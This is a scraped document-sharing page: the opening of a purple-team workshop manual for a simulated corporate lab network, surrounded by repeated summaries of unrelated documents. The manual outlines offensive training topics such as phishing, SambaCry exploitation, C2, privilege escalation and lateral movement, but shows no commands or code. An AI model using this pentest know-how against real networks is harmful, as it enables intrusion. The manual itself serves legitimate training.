Adversary emulation involves leveraging your Red Teams to use real-world adversary tactics, techniques and procedures (TTPs), alongside attack frameworks such as MITRE ATT&CK to: Identify control gaps (and weaknesses); Validate your monitoring, detection and response capabilities; Prioritising your security investments towards mitigating any shortcoming that may be observed using this approach.
Metasploit is an open source penetration testing framework that contains tools for scanning systems to identify vulnerabilities, exploits to take advantage of vulnerabilities, and payloads to control systems after exploitation. It provides a simple interface for security professionals to simulate attacks while testing systems and identifying weaknesses. The document discusses Metasploit's history and versions, how it can be used to conduct penetration testing, and key concepts like vulnerabilities, exploits, and payloads.
Vulnerability scanning evaluates an organization's systems and network to identify vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. The document discusses using the Advanced IP Scanner tool to perform a network scan on a target Windows Server 2008 system from a Windows 8 attacker system to check for live systems, open ports, and gather information about computers on the local network. It provides instructions on launching Advanced IP Scanner, entering an IP address range to scan, and viewing the scan results.
Monitoring What Matters: The Prometheus Approach to Whitebox Monitoring (Berl...Brian Brazil
Â
Prometheus is an open-source monitoring system that allows for whitebox monitoring through metrics collected from inside systems and applications. It provides the ability to alert on high-level symptoms, debug issues through customizable dashboards, and perform complex queries across metrics. Prometheus empowers building monitoring that matters through alerting on important business metrics, gaining insight via dashboards, and integrating with other systems via open interfaces.
The document describes a travel agency management system that offers the following key features:
- Integrated travel agents located directly in companies to make reservations and issue tickets.
- An electronic booking system that is IATA approved along with state-of-the-art technology.
- Dedicated and bilingual staff that provide personalized service and account management for corporate travel needs.
- One-stop shopping for all travel arrangements along with corporate agreements with airlines.
Web application penetration testing lab setup guideSudhanshu Chauhan
Â
This document provides guidance on setting up a basic environment for conducting web application penetration testing. It outlines both hardware and software requirements, including recommended tools. It then walks through installing a base OS, browsers, programming languages, web servers, and various security tools. It also provides an overview of the testing process, including information gathering, automated scanning, manual testing, and reporting.
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
Â
This document provides information on various open source and low-cost security tools and solutions, including test email servers, phishing training modules, phishing frameworks, password checking tools, email alerts, network mapping tools, and more. It also lists free business intelligence software, and resources on avoiding business email compromise scams.
The document discusses cyber security topics like web security, Zed Attack Proxy (ZAP), SQL injection, Damn Vulnerable Web Application (DVWA), and WebGoat. It provides an overview of these topics, including what ZAP is used for, how to configure it, and how to use its features like intercepting traffic, scanning, and reporting. It also discusses the Open Web Application Security Project (OWASP) and some of the top 10 vulnerabilities like SQL injection.
Metasploit is an open source penetration testing framework that contains tools for scanning systems to identify vulnerabilities, exploits to take advantage of vulnerabilities, and payloads to control systems after exploitation. It provides a simple interface for security professionals to simulate attacks while testing systems and identifying weaknesses. The document discusses Metasploit's history and versions, how it can be used to conduct penetration testing, and key concepts like vulnerabilities, exploits, and payloads.
Vulnerability scanning evaluates an organization's systems and network to identify vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. The document discusses using the Advanced IP Scanner tool to perform a network scan on a target Windows Server 2008 system from a Windows 8 attacker system to check for live systems, open ports, and gather information about computers on the local network. It provides instructions on launching Advanced IP Scanner, entering an IP address range to scan, and viewing the scan results.
Monitoring What Matters: The Prometheus Approach to Whitebox Monitoring (Berl...Brian Brazil
Â
Prometheus is an open-source monitoring system that allows for whitebox monitoring through metrics collected from inside systems and applications. It provides the ability to alert on high-level symptoms, debug issues through customizable dashboards, and perform complex queries across metrics. Prometheus empowers building monitoring that matters through alerting on important business metrics, gaining insight via dashboards, and integrating with other systems via open interfaces.
The document describes a travel agency management system that offers the following key features:
- Integrated travel agents located directly in companies to make reservations and issue tickets.
- An electronic booking system that is IATA approved along with state-of-the-art technology.
- Dedicated and bilingual staff that provide personalized service and account management for corporate travel needs.
- One-stop shopping for all travel arrangements along with corporate agreements with airlines.
Web application penetration testing lab setup guideSudhanshu Chauhan
Â
This document provides guidance on setting up a basic environment for conducting web application penetration testing. It outlines both hardware and software requirements, including recommended tools. It then walks through installing a base OS, browsers, programming languages, web servers, and various security tools. It also provides an overview of the testing process, including information gathering, automated scanning, manual testing, and reporting.
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
Â
This document provides information on various open source and low-cost security tools and solutions, including test email servers, phishing training modules, phishing frameworks, password checking tools, email alerts, network mapping tools, and more. It also lists free business intelligence software, and resources on avoiding business email compromise scams.
The document discusses cyber security topics like web security, Zed Attack Proxy (ZAP), SQL injection, Damn Vulnerable Web Application (DVWA), and WebGoat. It provides an overview of these topics, including what ZAP is used for, how to configure it, and how to use its features like intercepting traffic, scanning, and reporting. It also discusses the Open Web Application Security Project (OWASP) and some of the top 10 vulnerabilities like SQL injection.
An Introduction to Prometheus (GrafanaCon 2016)Brian Brazil
Â
Often what you monitor and get alerted on is defined by your tools, rather than what makes the most sense to you and your organisation. Alerts on metrics such as CPU usage which are noisy and rarely spot real problems, while outages go undetected. Monitoring systems can also be challenging to maintain, and overall provide a poor return on investment.
In the past few years several new monitoring systems have appeared with more powerful semantics and which are easier to run, which offer a way to vastly improve how your organisation operates and prepare you for a Cloud Native environment. Prometheus is one such system. This talk will look at the monitoring ideal and how whitebox monitoring with a time series database, multi-dimensional labels and a powerful querying/alerting language can free you from midnight pages.
Kali Linux is a Debian-based Linux distribution designed for penetration testing and security auditing. It includes over 500 security tools categorized under information gathering, vulnerability analysis, password attacks, wireless attacks, exploitation tools, maintaining access, and more. These tools are maintained by Offensive Security and aimed to help security professionals with tasks like scanning, penetration testing, forensics, and reverse engineering.
The development of a product from the point of view of a technician, starting from the concept, passing to the minimum viable till a management of a fully operational and deployed app.
This lab document describes using the Metasploit framework to perform exploits against Windows systems. It consists of six sections: installing Metasploit, adding a remote user to Windows XP, gaining remote command shell access to Windows XP, using DLL injection to open a remote VNC connection, remotely installing a rootkit on Windows, and setting up the Metasploit web interface. The document provides background on exploit frameworks and payloads, and guides students through exercises to complete each section.
You are already the Duke of DevOps: you have a master in CI/CD, some feature teams including ops skills, your TTM rocks ! But you have some difficulties to scale it. You have some quality issues, Qos at risk. You are quick to adopt practices that: increase flexibility of development and velocity of deployment. An urgent question follows on the heels of these benefits: how much confidence we can have in the complex systems that we put into production? Letâs talk about the next hype of DevOps: SRE, error budget, continuous quality, observability, Chaos Engineering.
This document provides an introduction and overview of the Kali Linux operating system and the Armitage tool. It discusses how Kali Linux is a Debian-based distribution for penetration testing and security auditing. It then describes Armitage as a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes post-exploitation features. Finally, it provides steps for initializing and implementing Armitage in Kali Linux.
LCP is a password cracking tool that can extract administrator passwords remotely. In this lab, LCP was used to crack the administrator password of a Windows Server 2012 system with IP address WIN-039MR5HL9E4. It retrieved the usernames and passwords of various accounts, including the administrator account. NTFS streams allow files to be hidden by associating them with the main file or directory as an alternate data stream. This lab demonstrates how to hide the calc.exe file in the C:\magic folder using NTFS streams so it is not visible normally.
This presentation will introduce the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through 4 different practical scenarios in a fictional company https://sensenet-library.com, the attendees will learn how they can use those frameworks to measure their security response in today's diverse security threat landscape. We'll go through categorising security controls, responding to a vulnerability report, assessing a threat intel report and decide on future of the company's toolset where you will be able to answer a question if you should continue investing in a tool or should you buy a new one.
Spectre and Meltdown are security vulnerabilities that break the isolation between different applications and between applications and the operating system. This allows confidential information like passwords, browser history and banking details to be accessed from other applications. Spectre is more difficult to exploit but also more difficult to mitigate than Meltdown. Software patches have been released to address the issues but they can impact performance, with some applications seeing degradations of 5-30%. Benchmarking tools are being used to better understand and mitigate the performance impacts.
The DevOps paradigm - the evolution of IT professionals and opensource toolkitMarco Ferrigno
Â
This document discusses the DevOps paradigm and tools. It begins by defining DevOps as focusing on communication and cooperation between development and operations teams. It then discusses concepts like continuous integration, delivery and deployment. It provides examples of tools used in DevOps like Docker, Kubernetes, Ansible, and monitoring tools. It discusses how infrastructure has evolved to be defined through code. Finally, it discusses challenges of security in DevOps and how DevOps works aligns with open source principles like meritocracy, metrics, and continuous improvement.
This document summarizes the DevOps paradigm and tools. It discusses how DevOps aims to improve communication and cooperation between development and operations teams through practices like continuous integration, delivery, and deployment. It then provides an overview of common DevOps tools for containers, cluster management, automation, CI/CD, monitoring, and infrastructure as code. Specific tools mentioned include Docker, Kubernetes, Ansible, Jenkins, and AWS CloudFormation. The document argues that adopting open source principles and emphasizing leadership, culture change, and talent growth are important for successful DevOps implementation.
Cyber security course in kerala | C|PENT | Blitz Academyamallblitz0
Â
Become a skilled cyber security professional in Kerala with the comprehensive C|PENT course at Blitz Academy. Gain hands-on experience and training. Contact now!
Become a skilled cyber security professional in Kerala with the comprehensive C|PENT course at Blitz Academy. Gain hands-on experience and training. Contact now!
https://blitzacademy.org/coursedetail.php?course_cat=9&course_id=2&Certified-Penetration-Testing-Professional-in-kerala
Adding Pentest Sauce to Your Vulnerability Management Recipe. Coves 10 tips to improve vulnerability management based on common red team and pentest findings.
This document provides an overview of SD-WAN and NSX SD-WAN by VeloCloud. It defines SD-WAN as using software and cloud technologies to simplify WAN services delivery to branch offices. Key benefits of SD-WAN include business agility, lower bandwidth costs using internet connectivity, and optimized connections to cloud applications. The document reviews SD-WAN features such as virtualizing networks, enabling secure overlays, and supporting automation through business policies. It provides examples of common business uses cases for SD-WAN and contrasts SD-WAN with traditional WAN optimization. Finally, it presents an at-a-glance overview of NSX SD-WAN by VeloCloud's capabilities and
Top 10 Software to Detect & Prevent Security Vulnerabilities from BlackHat US...Mobodexter
Â
BlackHat USA 2015 got recently concluded and we head a bunch of news around how BlackHat brought to light various security vulnerabilities in day-to-day life like ZigBee protocol, Device for stealing keyless cars & ATM card skimmers. However the presenters, who are also ethical hackers, also gave a bunch of tools to help software community to detect & prevent security holes in the hardware & software while the product is ready for release. We have reviewed all the presentations from the conference and give you here a list of Top 10 tools/utilities that helps in security vulnerability detection & prevention.
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston
Â
This document discusses challenges with testing web services and proposes improvements. It notes that current tools, methodologies, and testing environments for assessing web service security are inadequate. The document advocates aligning web service testing with the Penetration Testing Execution Standard methodology. It also highlights new attacks against web services and demos tools like Metasploit modules for assessing web services and the Damn Vulnerable Web Services testing environment.
Fueling AI with Great Data with Airbyte WebinarZilliz
Â
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
An Introduction to Prometheus (GrafanaCon 2016)Brian Brazil
Â
Often what you monitor and get alerted on is defined by your tools, rather than what makes the most sense to you and your organisation. Alerts on metrics such as CPU usage which are noisy and rarely spot real problems, while outages go undetected. Monitoring systems can also be challenging to maintain, and overall provide a poor return on investment.
In the past few years several new monitoring systems have appeared with more powerful semantics and which are easier to run, which offer a way to vastly improve how your organisation operates and prepare you for a Cloud Native environment. Prometheus is one such system. This talk will look at the monitoring ideal and how whitebox monitoring with a time series database, multi-dimensional labels and a powerful querying/alerting language can free you from midnight pages.
Kali Linux is a Debian-based Linux distribution designed for penetration testing and security auditing. It includes over 500 security tools categorized under information gathering, vulnerability analysis, password attacks, wireless attacks, exploitation tools, maintaining access, and more. These tools are maintained by Offensive Security and aimed to help security professionals with tasks like scanning, penetration testing, forensics, and reverse engineering.
The development of a product from the point of view of a technician, starting from the concept, passing to the minimum viable till a management of a fully operational and deployed app.
This lab document describes using the Metasploit framework to perform exploits against Windows systems. It consists of six sections: installing Metasploit, adding a remote user to Windows XP, gaining remote command shell access to Windows XP, using DLL injection to open a remote VNC connection, remotely installing a rootkit on Windows, and setting up the Metasploit web interface. The document provides background on exploit frameworks and payloads, and guides students through exercises to complete each section.
You are already the Duke of DevOps: you have a master in CI/CD, some feature teams including ops skills, your TTM rocks ! But you have some difficulties to scale it. You have some quality issues, Qos at risk. You are quick to adopt practices that: increase flexibility of development and velocity of deployment. An urgent question follows on the heels of these benefits: how much confidence we can have in the complex systems that we put into production? Letâs talk about the next hype of DevOps: SRE, error budget, continuous quality, observability, Chaos Engineering.
This document provides an introduction and overview of the Kali Linux operating system and the Armitage tool. It discusses how Kali Linux is a Debian-based distribution for penetration testing and security auditing. It then describes Armitage as a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes post-exploitation features. Finally, it provides steps for initializing and implementing Armitage in Kali Linux.
LCP is a password cracking tool that can extract administrator passwords remotely. In this lab, LCP was used to crack the administrator password of a Windows Server 2012 system with IP address WIN-039MR5HL9E4. It retrieved the usernames and passwords of various accounts, including the administrator account. NTFS streams allow files to be hidden by associating them with the main file or directory as an alternate data stream. This lab demonstrates how to hide the calc.exe file in the C:\magic folder using NTFS streams so it is not visible normally.
This presentation will introduce the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through 4 different practical scenarios in a fictional company https://sensenet-library.com, the attendees will learn how they can use those frameworks to measure their security response in today's diverse security threat landscape. We'll go through categorising security controls, responding to a vulnerability report, assessing a threat intel report and decide on future of the company's toolset where you will be able to answer a question if you should continue investing in a tool or should you buy a new one.
Spectre and Meltdown are security vulnerabilities that break the isolation between different applications and between applications and the operating system. This allows confidential information like passwords, browser history and banking details to be accessed from other applications. Spectre is more difficult to exploit but also more difficult to mitigate than Meltdown. Software patches have been released to address the issues but they can impact performance, with some applications seeing degradations of 5-30%. Benchmarking tools are being used to better understand and mitigate the performance impacts.
The DevOps paradigm - the evolution of IT professionals and opensource toolkitMarco Ferrigno
Â
This document discusses the DevOps paradigm and tools. It begins by defining DevOps as focusing on communication and cooperation between development and operations teams. It then discusses concepts like continuous integration, delivery and deployment. It provides examples of tools used in DevOps like Docker, Kubernetes, Ansible, and monitoring tools. It discusses how infrastructure has evolved to be defined through code. Finally, it discusses challenges of security in DevOps and how DevOps works aligns with open source principles like meritocracy, metrics, and continuous improvement.
This document summarizes the DevOps paradigm and tools. It discusses how DevOps aims to improve communication and cooperation between development and operations teams through practices like continuous integration, delivery, and deployment. It then provides an overview of common DevOps tools for containers, cluster management, automation, CI/CD, monitoring, and infrastructure as code. Specific tools mentioned include Docker, Kubernetes, Ansible, Jenkins, and AWS CloudFormation. The document argues that adopting open source principles and emphasizing leadership, culture change, and talent growth are important for successful DevOps implementation.
Cyber security course in kerala | C|PENT | Blitz Academyamallblitz0
Â
Become a skilled cyber security professional in Kerala with the comprehensive C|PENT course at Blitz Academy. Gain hands-on experience and training. Contact now!
Become a skilled cyber security professional in Kerala with the comprehensive C|PENT course at Blitz Academy. Gain hands-on experience and training. Contact now!
https://blitzacademy.org/coursedetail.php?course_cat=9&course_id=2&Certified-Penetration-Testing-Professional-in-kerala
Adding Pentest Sauce to Your Vulnerability Management Recipe. Coves 10 tips to improve vulnerability management based on common red team and pentest findings.
This document provides an overview of SD-WAN and NSX SD-WAN by VeloCloud. It defines SD-WAN as using software and cloud technologies to simplify WAN services delivery to branch offices. Key benefits of SD-WAN include business agility, lower bandwidth costs using internet connectivity, and optimized connections to cloud applications. The document reviews SD-WAN features such as virtualizing networks, enabling secure overlays, and supporting automation through business policies. It provides examples of common business uses cases for SD-WAN and contrasts SD-WAN with traditional WAN optimization. Finally, it presents an at-a-glance overview of NSX SD-WAN by VeloCloud's capabilities and
Top 10 Software to Detect & Prevent Security Vulnerabilities from BlackHat US...Mobodexter
Â
BlackHat USA 2015 got recently concluded and we head a bunch of news around how BlackHat brought to light various security vulnerabilities in day-to-day life like ZigBee protocol, Device for stealing keyless cars & ATM card skimmers. However the presenters, who are also ethical hackers, also gave a bunch of tools to help software community to detect & prevent security holes in the hardware & software while the product is ready for release. We have reviewed all the presentations from the conference and give you here a list of Top 10 tools/utilities that helps in security vulnerability detection & prevention.
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston
Â
This document discusses challenges with testing web services and proposes improvements. It notes that current tools, methodologies, and testing environments for assessing web service security are inadequate. The document advocates aligning web service testing with the Penetration Testing Execution Standard methodology. It also highlights new attacks against web services and demos tools like Metasploit modules for assessing web services and the Damn Vulnerable Web Services testing environment.
Similar to Purple Teaming With Adversary Emulation.pdf (20)
Fueling AI with Great Data with Airbyte WebinarZilliz
Â
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
Â
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This yearâs report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Trusted Execution Environment for Decentralized Process MiningLucaBarbaro3
Â
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Â
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfflufftailshop
Â
When it comes to unit testing in the .NET ecosystem, developers have a wide range of options available. Among the most popular choices are NUnit, XUnit, and MSTest. These unit testing frameworks provide essential tools and features to help ensure the quality and reliability of code. However, understanding the differences between these frameworks is crucial for selecting the most suitable one for your projects.
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Jeffrey Haguewood
Â
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on automated letter generation for Bonterra Impact Management using Google Workspace or Microsoft 365.
Interested in deploying letter generation automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxSitimaJohn
Â
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Dive into the realm of operating systems (OS) with Pravash Chandra Das, a seasoned Digital Forensic Analyst, as your guide. đ This comprehensive presentation illuminates the core concepts, types, and evolution of OS, essential for understanding modern computing landscapes.
Beginning with the foundational definition, Das clarifies the pivotal role of OS as system software orchestrating hardware resources, software applications, and user interactions. Through succinct descriptions, he delineates the diverse types of OS, from single-user, single-task environments like early MS-DOS iterations, to multi-user, multi-tasking systems exemplified by modern Linux distributions.
Crucial components like the kernel and shell are dissected, highlighting their indispensable functions in resource management and user interface interaction. Das elucidates how the kernel acts as the central nervous system, orchestrating process scheduling, memory allocation, and device management. Meanwhile, the shell serves as the gateway for user commands, bridging the gap between human input and machine execution. đ»
The narrative then shifts to a captivating exploration of prominent desktop OSs, Windows, macOS, and Linux. Windows, with its globally ubiquitous presence and user-friendly interface, emerges as a cornerstone in personal computing history. macOS, lauded for its sleek design and seamless integration with Apple's ecosystem, stands as a beacon of stability and creativity. Linux, an open-source marvel, offers unparalleled flexibility and security, revolutionizing the computing landscape. đ„ïž
Moving to the realm of mobile devices, Das unravels the dominance of Android and iOS. Android's open-source ethos fosters a vibrant ecosystem of customization and innovation, while iOS boasts a seamless user experience and robust security infrastructure. Meanwhile, discontinued platforms like Symbian and Palm OS evoke nostalgia for their pioneering roles in the smartphone revolution.
The journey concludes with a reflection on the ever-evolving landscape of OS, underscored by the emergence of real-time operating systems (RTOS) and the persistent quest for innovation and efficiency. As technology continues to shape our world, understanding the foundations and evolution of operating systems remains paramount. Join Pravash Chandra Das on this illuminating journey through the heart of computing. đ
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
Â
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Â
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Donât worry, we can help with all of this!
Weâll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. Weâll provide examples and solutions for those as well. And naturally weâll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether youâre at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. Weâll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...alexjohnson7307
Â
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
This presentation provides valuable insights into effective cost-saving techniques on AWS. Learn how to optimize your AWS resources by rightsizing, increasing elasticity, picking the right storage class, and choosing the best pricing model. Additionally, discover essential governance mechanisms to ensure continuous cost efficiency. Whether you are new to AWS or an experienced user, this presentation provides clear and practical tips to help you reduce your cloud costs and get the most out of your budget.
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
Â
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
2. Contents
Introduction 3
Features 3
Purpose 4
Prerequisites and Useful Tools 5
Prerequisite Knowledge 5
Tools 5
How to Connect 7
Methodology Overview 8
Vulnerability Scan vs Pentest (vs Real Attacker) 8
Attack Chain 8
Preparing for a Penetration Test 9
Virtual Machine Updates and Sanitization 9
Host Machine Configuration 9
Reconnaissance and Vulnerability Discovery 10
Initial Enumeration 10
Scanning 11
Manual Information Gathering 14
Unauthenticated Entry Points 15
Easily Guessable FTP 15
SambaCry 15
Missing Windows Patches 18
Phishing 20
Command and Control Infrastructure 24
Following topic will covered as part of Part 2 of the workshop
Privilege Escalation 28
Finding Credentials on a Compromised System 29
Lateral Movement 37
Active Directory 42
Searching for Target Information 56
3. Introduction
Welcome to your Workshop Lab environment! Weâre excited to host this environment and have a lot of
great content in store for you. What follows in this manual is a description of the lab, the tools and
knowledge youâll need to set yourself up for success, and a technical walkthrough that will teach you the
skills necessary to perform a complete network penetration test and more.
Features
This lab network has been designed to mirror a legitimate corporate network as closely as possible.
Based on our experience conducting internal pentests over the years, weâve included core features that
help to provide a true representation of the real world.
Windows Active Directory
All Demo environments feature a configured Active Directory (AD) with at least two domains. Larger
labs may have a more sophisticated AD setup that allows an experienced penetration tester to take
advantage of subtle misconfigurations such as domain trust issues. In every lab, AD is used extensively
to manage privilege across the environment. As in the real world, understanding and abusing Active
Directory is a key component of completing a pentest of your lab.
User Simulation
Real networks have active users, and so does your lab! As part of creating this simulated network, weâve
developed a PowerShell based tool that will simulate common user behaviors including accessing file
shares, browsing the internet, and opening emails. This means you have additional attack vectors at your
disposal. You can even conduct a full phishing campaign in your lab and use the access obtained to
further compromise the network.
Technical Vulnerabilities
Every network weâve ever encountered, big or small, contains at least a few technical vulnerabilities or
misconfigurations. There are several intentionally vulnerable systems configured throughout your lab
network which will allow you to obtain an initial âfootholdâ by successfully exploiting the vulnerability.
Network âTrophiesâ
Itâs important to demonstrate the impact of a network compromise. In real world engagements, we
typically attempt to gain access to critical business data (PII, PCI, HIPAA, etc.) to show the consequences
of the vulnerabilities we identify. So, our labs contain examples of sensitive data that you can access to
practice âtrophy huntingâ and proving your impact.
Endpoint Visibility
Corporate networks often have various detection and alerting mechanisms in place. Your lab is deployed
with Splunk to provide endpoint visibility. This allows blue teamers and red teamers alike to learn what
malicious traffic looks like, and how to detect it (or evade detection).
4. In addition to the core features above, your lab has a few more notable characteristics. First, the entire
lab is hosted in the cloud on Amazonâs AWS. This ensures reliability and accessibility from anywhere. In
addition, your lab network can only be accessed through a certificate-based VPN which was distributed
along with this lab manual. Another advantage of hosting the lab infrastructure in AWS manifests itself in
our ability to quickly change various configurations across the network. This allows us to easily change
how âdifficultâ the lab is and to simulate more mature organizations with additional network
segmentation and defensive controls.
Purpose
There are numerous use cases for your lab, and probably more that we havenât yet considered. We built
your lab with the three following primary use cases in mind:
Pentest / Red Team Training
The main goal of your lab is to help you develop the skills necessary to perform a network penetration
test or red team engagement in the real world, on a live production network. This includes learning how
to identify vulnerabilities, exploit them, and use the access obtained to further compromise the
network. In addition to the lab physically mirroring a corporate network, the methodology used
throughout this manual also mirrors industry standard practices for performing these types of
engagements. After completing this lab, you should have acquired the technical skills and high-level
knowledge to add value to any internal penetration test or red team you participate in.
Pentest / Red Team Technique Development and Practice
This lab also serves as a valuable platform for developing new tradecraft, testing exploits in a safe
environment, and practicing skills you already have. Because of the realistic nature of the lab, and our
ability to customize it to your specific needs, your lab is a powerful tool for any type of penetration
testing or red team activity that you might not want to perform for the first time on a production
network.
Blue Team Lens
Learn what red team activity looks like in a modern detection tool. With the deployment of Splunk
agents across much of the environment, your lab will track events triggered by various testing activities.
Visibility into events triggered by malicious activities helps us to become stealthier and invent new
techniques to bypass detection. Basic alerting also helps to ensure that you are avoiding particularly
risky behavior such as password spraying.
5. Prerequisites and Useful Tools
While there are no absolute pre-requisites for learning in the lab, there are some fundamental skills that
will speed your progress. To get the most out of your experience, we recommend the following:
Prerequisite Knowledge
A Working Knowledge of Networking Concepts
Your lab simulates a corporate network, so some basic networking skills will go a long way in
understanding various aspects of the penetration testing process. Among the important concepts to be
familiar with are:
TCP/IP: https://technet.microsoft.com/en-us/library/cc786128(v=ws.10).aspx
DNS: https://technet.microsoft.com/en-us/library/cc772774(v=ws.10).aspx
Network Segmentation / Firewalls: https://technet.microsoft.com/en-us/library/cc700820.aspx
An Understanding of Windows Active Directory
A majority of the privilege escalation scenarios encountered in corporate environments involve abusing
Active Directory. Understanding AD and how it manages privilege in a Windows environment is crucial
for effective security testing. We strongly encourage some research into Windows Active Directory if you
have not worked with AD groups or privileges prior to this lab.
Familiarity with the Windows and Linux Operating Systems
A lot of post exploitation activity involves interacting directly through the command line, or a command
and control channel with a similar feel. Knowing your way around the Windows and Linux filesystems, as
well as some comfortability using cmd.exe and bash, will smooth your pentesting experience.
Windows Command Line Reference: https://ss64.com/nt/
PowerShell Reference: https://ss64.com/ps/
Linux Bash Reference: https://ss64.com/bash/
Tools
Kali Linux
Kali is a Linux distribution optimized for penetration testing with an assortment of red team tools
installed and configured to make malicious activities easier (e.g. you log in as root). While there are
certainly other hacking focused distros out there, Kali is by far the most popular and will be used for
examples throughout this lab.
Download: https://www.kali.org/downloads/
Documentation: https://docs.kali.org/
6. Nmap
